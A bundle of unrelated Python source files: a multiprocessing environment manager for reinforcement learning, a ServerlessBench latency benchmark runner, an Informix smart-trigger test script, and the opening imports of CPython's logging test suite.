if __name__ == '__main__':
main()
# vim: set filetype=python tabstop=4 softtabstop=4 shiftwidth=4 expandtab:
# vim: set textwidth=79:
|
subprocess_env_manager.py | from typing import Any, Union, List, Tuple, Dict, Callable, Optional
from multiprocessing import Pipe, connection, get_context, Array
from collections import namedtuple
import logging
import platform
import time
import copy
import traceback
import numpy as np
import torch
import ctypes
import pickle
import cloudpickle
from easydict import EasyDict
from types import MethodType
from ding.utils import PropagatingThread, LockContextType, LockContext, ENV_MANAGER_REGISTRY
from .base_env_manager import BaseEnvManager, EnvState, retry_wrapper, timeout_wrapper
_NTYPE_TO_CTYPE = {
np.bool_: ctypes.c_bool,
np.uint8: ctypes.c_uint8,
np.uint16: ctypes.c_uint16,
np.uint32: ctypes.c_uint32,
np.uint64: ctypes.c_uint64,
np.int8: ctypes.c_int8,
np.int16: ctypes.c_int16,
np.int32: ctypes.c_int32,
np.int64: ctypes.c_int64,
np.float32: ctypes.c_float,
np.float64: ctypes.c_double,
}
class ShmBuffer():
"""
Overview:
Shared memory buffer to store numpy array.
"""
def __init__(self, dtype: np.generic, shape: Tuple[int]) -> None:
"""
Overview:
Initialize the buffer.
Arguments:
- dtype (:obj:`np.generic`): dtype of the data to limit the size of the buffer.
- shape (:obj:`Tuple[int]`): shape of the data to limit the size of the buffer.
"""
self.buffer = Array(_NTYPE_TO_CTYPE[dtype.type], int(np.prod(shape)))
self.dtype = dtype
self.shape = shape
def fill(self, src_arr: np.ndarray) -> None:
"""
Overview:
Fill the shared memory buffer with a numpy array. (Replace the original one.)
Arguments:
- src_arr (:obj:`np.ndarray`): array to fill the buffer.
"""
assert isinstance(src_arr, np.ndarray), type(src_arr)
dst_arr = np.frombuffer(self.buffer.get_obj(), dtype=self.dtype).reshape(self.shape)
with self.buffer.get_lock():
np.copyto(dst_arr, src_arr)
def get(self) -> np.ndarray:
"""
Overview:
Get the array stored in the buffer.
Return:
- copy_data (:obj:`np.ndarray`): A copy of the data stored in the buffer.
"""
arr = np.frombuffer(self.buffer.get_obj(), dtype=self.dtype).reshape(self.shape)
return arr.copy()
class ShmBufferContainer(object):
"""
Overview:
Support multiple shared memory buffers. Each key-value is name-buffer.
"""
def __init__(self, dtype: np.generic, shape: Union[Dict[Any, tuple], tuple]) -> None:
"""
Overview:
Initialize the buffer container.
Arguments:
- dtype (:obj:`np.generic`): dtype of the data to limit the size of the buffer.
- shape (:obj:`Union[Dict[Any, tuple], tuple]`): If `Dict[Any, tuple]`, use a dict to manage \
multiple buffers; If `tuple`, use single buffer.
"""
if isinstance(shape, dict):
self._data = {k: ShmBufferContainer(dtype, v) for k, v in shape.items()}
elif isinstance(shape, (tuple, list)):
self._data = ShmBuffer(dtype, shape)
else:
raise RuntimeError("not support shape: {}".format(shape))
self._shape = shape
def fill(self, src_arr: Union[Dict[Any, np.ndarray], np.ndarray]) -> None:
"""
Overview:
Fill the one or many shared memory buffer.
Arguments:
- src_arr (:obj:`Union[Dict[Any, np.ndarray], np.ndarray]`): array to fill the buffer.
"""
if isinstance(self._shape, dict):
for k in self._shape.keys():
self._data[k].fill(src_arr[k])
elif isinstance(self._shape, (tuple, list)):
self._data.fill(src_arr)
def get(self) -> Union[Dict[Any, np.ndarray], np.ndarray]:
"""
Overview:
Get the one or many arrays stored in the buffer.
Return:
- data (:obj:`np.ndarray`): The array(s) stored in the buffer.
"""
if isinstance(self._shape, dict):
return {k: self._data[k].get() for k in self._shape.keys()}
elif isinstance(self._shape, (tuple, list)):
return self._data.get()
class CloudPickleWrapper:
"""
Overview:
CloudPickleWrapper can be able to pickle more python object(e.g: an object with lambda expression)
"""
def __init__(self, data: Any) -> None:
self.data = data
def __getstate__(self) -> bytes:
return cloudpickle.dumps(self.data)
def __setstate__(self, data: bytes) -> None:
if isinstance(data, (tuple, list, np.ndarray)): # pickle is faster
self.data = pickle.loads(data)
else:
self.data = cloudpickle.loads(data)
@ENV_MANAGER_REGISTRY.register('async_subprocess')
class AsyncSubprocessEnvManager(BaseEnvManager):
"""
Overview:
Create an AsyncSubprocessEnvManager to manage multiple environments.
Each Environment is run by a respective subprocess.
Interfaces:
seed, launch, ready_obs, step, reset, env_info,active_env
"""
config = dict(
episode_num=float("inf"),
max_retry=5,
step_timeout=60,
auto_reset=True,
reset_timeout=60,
retry_waiting_time=0.1,
# subprocess specified args
shared_memory=True,
context='spawn' if platform.system().lower() == 'windows' else 'fork',
wait_num=2,
step_wait_timeout=0.01,
connect_timeout=60,
)
def __init__(
self,
env_fn: List[Callable],
cfg: EasyDict = EasyDict({}),
) -> None:
"""
Overview:
Initialize the AsyncSubprocessEnvManager.
Arguments:
- env_fn (:obj:`List[Callable]`): The function to create environment
- cfg (:obj:`EasyDict`): Config
"""
super().__init__(env_fn, cfg)
self._shared_memory = self._cfg.shared_memory
self._context = self._cfg.context
self._wait_num = self._cfg.wait_num
self._step_wait_timeout = self._cfg.step_wait_timeout
self._lock = LockContext(LockContextType.THREAD_LOCK)
self._connect_timeout = self._cfg.connect_timeout
self._connect_timeout = np.max([self._connect_timeout, self._step_timeout + 0.5, self._reset_timeout + 0.5])
def _create_state(self) -> None:
r"""
Overview:
Fork/spawn sub-processes(Call ``_create_env_subprocess``) and create pipes to transfer the data.
"""
self._env_episode_count = {env_id: 0 for env_id in range(self.env_num)}
self._ready_obs = {env_id: None for env_id in range(self.env_num)}
self._env_ref = self._env_fn[0]()
self._reset_param = {i: {} for i in range(self.env_num)}
if self._shared_memory:
obs_space = self._env_ref.info().obs_space
shape = obs_space.shape
dtype = np.dtype(obs_space.value['dtype']) if obs_space.value is not None else np.dtype(np.float32)
self._obs_buffers = {env_id: ShmBufferContainer(dtype, shape) for env_id in range(self.env_num)}
else:
self._obs_buffers = {env_id: None for env_id in range(self.env_num)}
self._pipe_parents, self._pipe_children = {}, {}
self._subprocesses = {}
for env_id in range(self.env_num):
self._create_env_subprocess(env_id)
self._waiting_env = {'step': set()}
self._setup_async_args()
self._closed = False
def _create_env_subprocess(self, env_id):
# start a new one
self._pipe_parents[env_id], self._pipe_children[env_id] = Pipe()
ctx = get_context(self._context)
self._subprocesses[env_id] = ctx.Process(
# target=self.worker_fn,
target=self.worker_fn_robust,
args=(
self._pipe_parents[env_id],
self._pipe_children[env_id],
CloudPickleWrapper(self._env_fn[env_id]),
self._obs_buffers[env_id],
self.method_name_list,
self._reset_timeout,
self._step_timeout,
self._max_retry,
),
daemon=True,
name='subprocess_env_manager{}_{}'.format(env_id, time.time())
)
self._subprocesses[env_id].start()
self._pipe_children[env_id].close()
self._env_states[env_id] = EnvState.INIT
if self._env_replay_path is not None:
self._pipe_parents[env_id].send(['enable_save_replay', [self._env_replay_path[env_id]], {}])
self._pipe_parents[env_id].recv()
def _setup_async_args(self) -> None:
r"""
Overview:
Set up the async arguments utilized in method ``step``.
.. note::
- wait_num: for each time the minimum number of env return to gather
- timeout: for each time the minimum number of env return to gather
"""
self._async_args = {
'step': {
'mode': 'async',
'wait_num': self._wait_num,
'timeout': self._step_wait_timeout
},
}
@property
def ready_env(self) -> List[int]:
return [i for i in self.active_env if i not in self._waiting_env['step']]
@property
def ready_obs(self) -> Dict[int, Any]:
"""
Overview:
Get the next observations.
Return:
A dictionary with observations and their environment IDs.
Note:
The observations are returned in np.ndarray.
Example:
>>> obs_dict = env_manager.ready_obs
>>> actions_dict = {env_id: model.forward(obs) for env_id, obs in obs_dict.items())}
"""
no_done_env_idx = [i for i, s in self._env_states.items() if s != EnvState.DONE]
sleep_count = 0
while not any([self._env_states[i] == EnvState.RUN for i in no_done_env_idx]):
if sleep_count % 1000 == 0:
logging.warning(
'VEC_ENV_MANAGER: all the not done envs are resetting, sleep {} times'.format(sleep_count)
)
time.sleep(0.001)
sleep_count += 1
return {i: self._ready_obs[i] for i in self.ready_env}
def launch(self, reset_param: Optional[Dict] = None) -> None:
"""
Overview:
Set up the environments and their parameters.
Arguments:
- reset_param (:obj:`Optional[Dict]`): Dict of reset parameters for each environment, key is the env_id, \
value is the cooresponding reset parameters.
"""
assert self._closed, "please first close the env manager"
if reset_param is not None:
assert len(reset_param) == len(self._env_fn)
self._create_state()
self.reset(reset_param)
def reset(self, reset_param: Optional[Dict] = None) -> None:
"""
Overview:
Reset the environments their parameters.
Arguments:
- reset_param (:obj:`List`): Dict of reset parameters for each environment, key is the env_id, \
value is the cooresponding reset parameters.
"""
self._check_closed()
# clear previous info
for env_id in self._waiting_env['step']:
self._pipe_parents[env_id].recv()
self._waiting_env['step'].clear()
if reset_param is None:
reset_env_list = [env_id for env_id in range(self._env_num)]
else:
reset_env_list = reset_param.keys()
for env_id in reset_param:
self._reset_param[env_id] = reset_param[env_id]
sleep_count = 0
while any([self._env_states[i] == EnvState.RESET for i in reset_env_list]):
if sleep_count % 1000 == 0:
logging.warning(
'VEC_ENV_MANAGER: not all the envs finish resetting, sleep {} times'.format(sleep_count)
)
time.sleep(0.001)
sleep_count += 1
# reset env
reset_thread_list = []
for i, env_id in enumerate(reset_env_list):
self._env_states[env_id] = EnvState.RESET
# set seed
if self._env_seed[env_id] is not None:
try:
if self._env_dynamic_seed is not None:
self._pipe_parents[env_id].send(['seed', [self._env_seed[env_id], self._env_dynamic_seed], {}])
else:
self._pipe_parents[env_id].send(['seed', [self._env_seed[env_id]], {}])
ret = self._pipe_parents[env_id].recv()
self._check_data({env_id: ret})
self._env_seed[env_id] = None # seed only use once
except Exception as e:
logging.warning("subprocess reset set seed failed, ignore and continue...")
reset_thread = PropagatingThread(target=self._reset, args=(env_id, ))
reset_thread.daemon = True
reset_thread_list.append(reset_thread)
for t in reset_thread_list:
t.start()
for t in reset_thread_list:
t.join()
def _reset(self, env_id: int) -> None:
@retry_wrapper(max_retry=self._max_retry, waiting_time=self._retry_waiting_time)
def reset_fn():
if self._pipe_parents[env_id].poll():
recv_data = self._pipe_parents[env_id].recv()
raise Exception("unread data left before sending to the pipe: {}".format(repr(recv_data)))
# if self._reset_param[env_id] is None, just reset specific env, not pass reset param
if self._reset_param[env_id] is not None:
assert isinstance(self._reset_param[env_id], dict), type(self._reset_param[env_id])
self._pipe_parents[env_id].send(['reset', [], self._reset_param[env_id]])
else:
self._pipe_parents[env_id].send(['reset', [], {}])
if not self._pipe_parents[env_id].poll(self._connect_timeout):
# terminate the old subprocess
self._pipe_parents[env_id].close()
if self._subprocesses[env_id].is_alive():
self._subprocesses[env_id].terminate()
# reset the subprocess
self._create_env_subprocess(env_id)
raise Exception("env reset timeout") # Leave it to retry_wrapper to try again
obs = self._pipe_parents[env_id].recv()
self._check_data({env_id: obs}, close=False)
if self._shared_memory:
obs = self._obs_buffers[env_id].get()
# Because each thread updates the corresponding env_id value, they won't lead to a thread-safe problem.
self._env_states[env_id] = EnvState.RUN
self._ready_obs[env_id] = obs
try:
reset_fn()
except Exception as e:
logging.error('VEC_ENV_MANAGER: env {} reset error'.format(env_id))
logging.error('\nEnv Process Reset Exception:\n' + ''.join(traceback.format_tb(e.__traceback__)) + repr(e))
if self._closed: # exception cased by main thread closing parent_remote
return
else:
self.close()
raise e
def step(self, actions: Dict[int, Any]) -> Dict[int, namedtuple]:
"""
Overview:
Step all environments. Reset an env if done.
Arguments:
- actions (:obj:`Dict[int, Any]`): {env_id: action}
Returns:
- timesteps (:obj:`Dict[int, namedtuple]`): {env_id: timestep}. Timestep is a \
``BaseEnvTimestep`` tuple with observation, reward, done, env_info.
Example:
>>> actions_dict = {env_id: model.forward(obs) for env_id, obs in obs_dict.items())}
>>> timesteps = env_manager.step(actions_dict):
>>> for env_id, timestep in timesteps.items():
>>> pass
.. note:
- The env_id that appears in ``actions`` will also be returned in ``timesteps``.
- Each environment is run by a subprocess separately. Once an environment is done, it is reset immediately.
- Async subprocess env manager use ``connection.wait`` to poll.
"""
self._check_closed()
env_ids = list(actions.keys())
assert all([self._env_states[env_id] == EnvState.RUN for env_id in env_ids]
), 'current env state are: {}, please check whether the requested env is in reset or done'.format(
{env_id: self._env_states[env_id]
for env_id in env_ids}
)
for env_id, act in actions.items():
self._pipe_parents[env_id].send(['step', [act], {}])
timesteps = {}
step_args = self._async_args['step']
wait_num, timeout = min(step_args['wait_num'], len(env_ids)), step_args['timeout']
rest_env_ids = list(set(env_ids).union(self._waiting_env['step']))
ready_env_ids = []
cur_rest_env_ids = copy.deepcopy(rest_env_ids)
while True:
rest_conn = [self._pipe_parents[env_id] for env_id in cur_rest_env_ids]
ready_conn, ready_ids = AsyncSubprocessEnvManager.wait(rest_conn, min(wait_num, len(rest_conn)), timeout)
cur_ready_env_ids = [cur_rest_env_ids[env_id] for env_id in ready_ids]
assert len(cur_ready_env_ids) == len(ready_conn)
timesteps.update({env_id: p.recv() for env_id, p in zip(cur_ready_env_ids, ready_conn)})
self._check_data(timesteps)
ready_env_ids += cur_ready_env_ids
cur_rest_env_ids = list(set(cur_rest_env_ids).difference(set(cur_ready_env_ids)))
# At least one not done env timestep, or all envs' steps are finished
if any([not t.done for t in timesteps.values()]) or len(ready_conn) == len(rest_conn):
break
self._waiting_env['step']: set
for env_id in rest_env_ids:
if env_id in ready_env_ids:
if env_id in self._waiting_env['step']:
self._waiting_env['step'].remove(env_id)
else:
self._waiting_env['step'].add(env_id)
if self._shared_memory:
for i, (env_id, timestep) in enumerate(timesteps.items()):
timesteps[env_id] = timestep._replace(obs=self._obs_buffers[env_id].get())
for env_id, timestep in timesteps.items():
if timestep.info.get('abnormal', False):
self._env_states[env_id] = EnvState.ERROR
continue
if timestep.done:
self._env_episode_count[env_id] += 1
if self._env_episode_count[env_id] < self._episode_num and self._auto_reset:
self._env_states[env_id] = EnvState.RESET
reset_thread = PropagatingThread(target=self._reset, args=(env_id, ), name='regular_reset')
reset_thread.daemon = True
reset_thread.start()
else:
self._env_states[env_id] = EnvState.DONE
else:
self._ready_obs[env_id] = timestep.obs
return timesteps
# This method must be staticmethod, otherwise there will be some resource conflicts(e.g. port or file)
# Env must be created in worker, which is a trick of avoiding env pickle errors.
# A more robust version is used by default. But this one is also preserved.
@staticmethod
def worker_fn(
p: connection.Connection, c: connection.Connection, env_fn_wrapper: 'CloudPickleWrapper',
obs_buffer: ShmBuffer, method_name_list: list
) -> None: # noqa
"""
Overview:
Subprocess's target function to run.
"""
torch.set_num_threads(1)
env_fn = env_fn_wrapper.data
env = env_fn()
p.close()
try:
while True:
try:
cmd, args, kwargs = c.recv()
except EOFError: # for the case when the pipe has been closed
c.close()
break
try:
if cmd == 'getattr':
ret = getattr(env, args[0])
elif cmd in method_name_list:
if cmd == 'step':
timestep = env.step(*args, **kwargs)
if timestep.info.get('abnormal', False):
ret = timestep
else:
if obs_buffer is not None:
obs_buffer.fill(timestep.obs)
timestep = timestep._replace(obs=None)
ret = timestep
elif cmd == 'reset':
ret = env.reset(*args, **kwargs) # obs
if obs_buffer is not None:
obs_buffer.fill(ret)
ret = None
elif args is None and kwargs is None:
ret = getattr(env, cmd)()
else:
ret = getattr(env, cmd)(*args, **kwargs)
else:
raise KeyError("not support env cmd: {}".format(cmd))
c.send(ret)
except Exception as e:
# when there are some errors in env, worker_fn will send the errors to env manager
# directly send error to another process will lose the stack trace, so we create a new Exception
c.send(
e.__class__(
'\nEnv Process Exception:\n' + ''.join(traceback.format_tb(e.__traceback__)) + repr(e)
)
)
if cmd == 'close':
c.close()
break
except KeyboardInterrupt:
c.close()
@staticmethod
def worker_fn_robust(
parent,
child,
env_fn_wrapper,
obs_buffer,
method_name_list,
reset_timeout=60,
step_timeout=60,
max_retry=1
) -> None:
"""
Overview:
A more robust version of subprocess's target function to run. Used by default.
"""
torch.set_num_threads(1)
env_fn = env_fn_wrapper.data
env = env_fn()
parent.close()
@retry_wrapper(max_retry=max_retry)
@timeout_wrapper(timeout=step_timeout)
def step_fn(*args, **kwargs):
timestep = env.step(*args, **kwargs)
if timestep.info.get('abnormal', False):
ret = timestep
else:
if obs_buffer is not None:
obs_buffer.fill(timestep.obs)
timestep = timestep._replace(obs=None)
ret = timestep
return ret
# self._reset method has add retry_wrapper decorator
@timeout_wrapper(timeout=reset_timeout)
def reset_fn(*args, **kwargs):
try:
ret = env.reset(*args, **kwargs)
if obs_buffer is not None:
obs_buffer.fill(ret)
ret = None
return ret
except Exception as e:
env.close()
raise e
while True:
try:
cmd, args, kwargs = child.recv()
except EOFError: # for the case when the pipe has been closed
child.close()
break
try:
if cmd == 'getattr':
ret = getattr(env, args[0])
elif cmd in method_name_list:
if cmd == 'step':
ret = step_fn(*args, **kwargs)
elif cmd == 'reset':
ret = reset_fn(*args, **kwargs)
elif args is None and kwargs is None:
ret = getattr(env, cmd)()
else:
ret = getattr(env, cmd)(*args, **kwargs)
else:
raise KeyError("not support env cmd: {}".format(cmd))
child.send(ret)
except Exception as e:
# print("Sub env '{}' error when executing {}".format(str(env), cmd))
# when there are some errors in env, worker_fn will send the errors to env manager
# directly send error to another process will lose the stack trace, so we create a new Exception
child.send(
e.__class__('\nEnv Process Exception:\n' + ''.join(traceback.format_tb(e.__traceback__)) + repr(e))
)
if cmd == 'close':
child.close()
break
def _check_data(self, data: Dict, close: bool = True) -> None:
exceptions = []
for i, d in data.items():
if isinstance(d, Exception):
self._env_states[i] = EnvState.ERROR
exceptions.append(d)
# when receiving env Exception, env manager will safely close and raise this Exception to caller
if len(exceptions) > 0:
if close:
self.close()
raise exceptions[0]
# override
def __getattr__(self, key: str) -> Any:
self._check_closed()
# we suppose that all the envs has the same attributes, if you need different envs, please
# create different env managers.
if not hasattr(self._env_ref, key):
raise AttributeError("env `{}` doesn't have the attribute `{}`".format(type(self._env_ref), key))
if isinstance(getattr(self._env_ref, key), MethodType) and key not in self.method_name_list:
raise RuntimeError("env getattr doesn't supports method({}), please override method_name_list".format(key))
for _, p in self._pipe_parents.items():
p.send(['getattr', [key], {}])
data = {i: p.recv() for i, p in self._pipe_parents.items()}
self._check_data(data)
ret = [data[i] for i in self._pipe_parents.keys()]
return ret
# override
def enable_save_replay(self, replay_path: Union[List[str], str]) -> None:
"""
Overview:
Set each env's replay save path.
Arguments:
- replay_path (:obj:`Union[List[str], str]`): List of paths for each environment; \
Or one path for all environments.
"""
if isinstance(replay_path, str):
replay_path = [replay_path] * self.env_num
self._env_replay_path = replay_path
# override
def close(self) -> None:
"""
Overview:
CLose the env manager and release all related resources.
"""
if self._closed:
return
self._closed = True
self._env_ref.close()
for _, p in self._pipe_parents.items():
p.send(['close', None, None])
for _, p in self._pipe_parents.items():
p.recv()
for i in range(self._env_num):
self._env_states[i] = EnvState.VOID
# disable process join for avoiding hang
# for p in self._subprocesses:
# p.join()
for _, p in self._subprocesses.items():
p.terminate()
for _, p in self._pipe_parents.items():
p.close()
@staticmethod
def wait(rest_conn: list, wait_num: int, timeout: Optional[float] = None) -> Tuple[list, list]:
"""
Overview:
Wait at least enough(len(ready_conn) >= wait_num) connections within timeout constraint.
If timeout is None and wait_num == len(ready_conn), means sync mode;
If timeout is not None, will return when len(ready_conn) >= wait_num and
this method takes more than timeout seconds.
"""
assert 1 <= wait_num <= len(rest_conn
), 'please indicate proper wait_num: <wait_num: {}, rest_conn_num: {}>'.format(
wait_num, len(rest_conn)
)
rest_conn_set = set(rest_conn)
ready_conn = set()
start_time = time.time()
while len(rest_conn_set) > 0:
if len(ready_conn) >= wait_num and timeout:
if (time.time() - start_time) >= timeout:
break
finish_conn = set(connection.wait(rest_conn_set, timeout=timeout))
ready_conn = ready_conn.union(finish_conn)
rest_conn_set = rest_conn_set.difference(finish_conn)
ready_ids = [rest_conn.index(c) for c in ready_conn]
return list(ready_conn), ready_ids
@ENV_MANAGER_REGISTRY.register('subprocess')
class SyncSubprocessEnvManager(AsyncSubprocessEnvManager):
def _setup_async_args(self) -> None:
self._async_args = {
'step': {
'mode': 'sync',
'wait_num': self._env_num, # math.inf,
'timeout': None,
},
}
def step(self, actions: Dict[int, Any]) -> Dict[int, namedtuple]:
"""
Overview:
Step all environments. Reset an env if done.
Arguments:
- actions (:obj:`Dict[int, Any]`): {env_id: action}
Returns:
- timesteps (:obj:`Dict[int, namedtuple]`): {env_id: timestep}. Timestep is a \
``BaseEnvTimestep`` tuple with observation, reward, done, env_info.
Example:
>>> actions_dict = {env_id: model.forward(obs) for env_id, obs in obs_dict.items())}
>>> timesteps = env_manager.step(actions_dict):
>>> for env_id, timestep in timesteps.items():
>>> pass
.. note::
- The env_id that appears in ``actions`` will also be returned in ``timesteps``.
- Each environment is run by a subprocess separately. Once an environment is done, it is reset immediately.
"""
self._check_closed()
env_ids = list(actions.keys())
assert all([self._env_states[env_id] == EnvState.RUN for env_id in env_ids]
), 'current env state are: {}, please check whether the requested env is in reset or done'.format(
{env_id: self._env_states[env_id]
for env_id in env_ids}
)
for env_id, act in actions.items():
self._pipe_parents[env_id].send(['step', [act], {}])
# === This part is different from async one. ===
# === Because operate in this way is more efficient. ===
timesteps = {}
ready_conn = [self._pipe_parents[env_id] for env_id in env_ids]
timesteps.update({env_id: p.recv() for env_id, p in zip(env_ids, ready_conn)})
self._check_data(timesteps)
# ======================================================
if self._shared_memory:
for i, (env_id, timestep) in enumerate(timesteps.items()):
timesteps[env_id] = timestep._replace(obs=self._obs_buffers[env_id].get())
for env_id, timestep in timesteps.items():
if timestep.info.get('abnormal', False):
self._env_states[env_id] = EnvState.ERROR
continue
if timestep.done:
self._env_episode_count[env_id] += 1
if self._env_episode_count[env_id] < self._episode_num and self._auto_reset:
self._env_states[env_id] = EnvState.RESET
reset_thread = PropagatingThread(target=self._reset, args=(env_id, ), name='regular_reset')
reset_thread.daemon = True
reset_thread.start()
else:
self._env_states[env_id] = EnvState.DONE
else:
self._ready_obs[env_id] = timestep.obs
return timesteps
|
run.py |
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "complexc"
actionName = "complex-c"
params = ""
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,startTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + \
',' + clientResult[j][2] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','','']
i = 0
count = 0
while count < 3:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
|
test_SmartTrigger.py | import IfxPy
from ctypes import *
import threading
import os
def printme1(outValue1):
"This prints a passed string into this function1"
print ("\nTest for callback function, value = ", outValue1)
return
def printme2(outValue2):
"This prints a passed string into this function2"
print ("\nTest for callback function, value = ", outValue2)
return
def task1():
print("Task 1 assigned to thread: {}".format(threading.current_thread().name))
print("ID of process running task 1: {}".format(os.getpid()))
temp4 = IfxPy.register_smart_trigger_loop(conn, printme1, temp, "t1", "informix", "sheshdb", "select * from t1;", "label1", False, False)
#temp4 = IfxPy.register_smart_trigger_loop(conn, printme1, temp, "बस", "informix", "sheshdb_utf8", "select * from बस;", "label1", False, False)
def task2():
print("Task 2 assigned to thread: {}".format(threading.current_thread().name))
print("ID of process running task 2: {}".format(os.getpid()))
#temp5 = IfxPy.register_smart_trigger_loop(conn, printme2, temp, "t2", "informix", "sheshdb", "select * from t2;", "label2", False, False)
temp5 = IfxPy.register_smart_trigger_loop(conn, printme2, temp, "t2", "informix", "sheshdb_utf8", "select * from t2;", "label2", False, False)
# if __name__ == "__main__":
# ConStr = "SERVER=ol_informix1410;DATABASE=sheshdb_utf8;HOST=127.0.0.1;SERVICE=1067;UID=informix;PWD=xxxx;DB_LOCALE=en_us.utf8;CLIENT_LOCALE=en_us.UTF8;"
ConStr = "SERVER=ol_informix1410;DATABASE=sheshdb;HOST=127.0.0.1;SERVICE=1067;UID=informix;PWD=xxx;"
conn = IfxPy.connect( ConStr, "", "")
temp = IfxPy.open_smart_trigger(conn, "Unique1", False, 5, 1, 0)
print ("\nFile descriptor = ", temp)
# creating threads
t1 = threading.Thread(target=task1, name='t1')
t2 = threading.Thread(target=task2, name='t2')
# starting threads
t1.start()
t2.start()
# wait until all threads finish
t1.join()
t2.join()
IfxPy.close(conn)
print ("Done") |
test_logging.py | # Copyright 2001-2021 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2021 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import shutil
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
from test.support import os_helper
